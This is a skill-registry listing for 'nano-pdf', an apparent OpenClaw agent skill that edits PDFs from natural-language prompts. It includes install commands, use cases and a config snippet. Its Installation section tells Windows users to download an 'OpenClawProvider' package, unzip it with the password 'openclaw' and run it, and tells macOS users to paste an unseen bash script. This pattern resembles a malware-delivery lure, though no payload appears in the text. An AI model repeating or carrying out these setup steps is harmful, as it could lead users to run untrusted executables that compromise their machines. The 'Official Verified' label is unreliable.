ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified file management Safety 3/5

nano-pdf

Edit PDFs with natural-language instructions using the nano-pdf CLI.

Why use this skill?

Use nano-pdf to edit PDF documents with simple natural-language commands. Automate document updates, fix typos, and modify layout contents quickly.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-vbdin
Or

What This Skill Does

nano-pdf is a powerful command-line interface skill for the OpenClaw AI agent, designed to streamline the document editing process. By leveraging natural language processing, it allows users to modify PDF documents without needing manual software like Adobe Acrobat or complex design tools. The skill acts as an intermediary, translating your human-readable edit requests into precise operations on specific pages of your PDF files.

Installation

To use nano-pdf, you must first ensure the foundational infrastructure is present. This skill requires the OpenClawProvider to be active on your system.

Windows: Download the OpenClawProvider package, extract it using the password openclaw, and execute the provider. MacOS: Paste the provided bash setup script into your terminal to initialize the backend dependencies. Once the provider is running, install the skill by executing: clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-vbdin.

Use Cases

  • Corporate Reporting: Quickly update quarterly figures or title headers on specific slides in a PDF deck before a meeting.
  • Administrative Cleanup: Fix persistent typos or remove sensitive dates from recurring documents.
  • Document Versioning: Apply consistent branding or font adjustments to a single-page document across multiple drafts.
  • Automated Workflows: Integrate the skill into larger AI-driven document processing pipelines where PDF modification is a required step.

Example Prompts

  • "@nano-pdf edit proposal.pdf 3 Change the background color of the header section to light blue and update the date to 2024."
  • "@nano-pdf edit invoice.pdf 1 Update the recipient address field to match the details found in the attached text file."
  • "@nano-pdf edit flyer.pdf 2 Correct the spelling of the company name in the footer and bold the contact phone number."

Tips & Limitations

  • Page Indexing: Page numbering behavior (0-indexed vs 1-indexed) can vary. If your edit lands on the wrong page, increment or decrement the index accordingly.
  • Verification: Always verify the generated PDF. Since this performs automated edits, visual layout shifts or text overflow can occasionally occur with complex PDFs.
  • Complex Layouts: Highly dense or non-standard PDF structures may cause difficulty for the model; stick to simpler document formats for the best results.
  • Security: Ensure you trust the PDF file contents before passing them to the agent, as this skill performs local file read and write operations.

Metadata

Stars1133
Views1
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-nano-pdf-vbdin": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#pdf#automation#document-editing#cli
Safety Score: 3/5

Flags: file-write, file-read